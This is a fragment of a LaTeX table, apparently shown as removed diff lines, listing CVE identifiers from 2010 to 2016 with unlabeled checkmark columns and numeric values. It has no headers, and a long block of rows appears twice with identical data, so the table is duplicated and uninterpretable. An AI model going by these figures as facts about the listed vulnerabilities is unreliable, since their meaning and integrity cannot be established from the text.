/checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule -CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule -CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule -CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule -CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule -CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule -CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule -CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule -CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule -CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule -CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule -CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule -CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule -CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule -CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule -CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule -CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule -CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule -CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule -CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule -CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule -CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule -CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule -CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule -CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule -CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule -CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule -CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule -CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule -CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule -CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule -CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule -CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule -CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule -CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule -CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule -CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule -CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule -CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule -CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule -CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule -CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule -CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 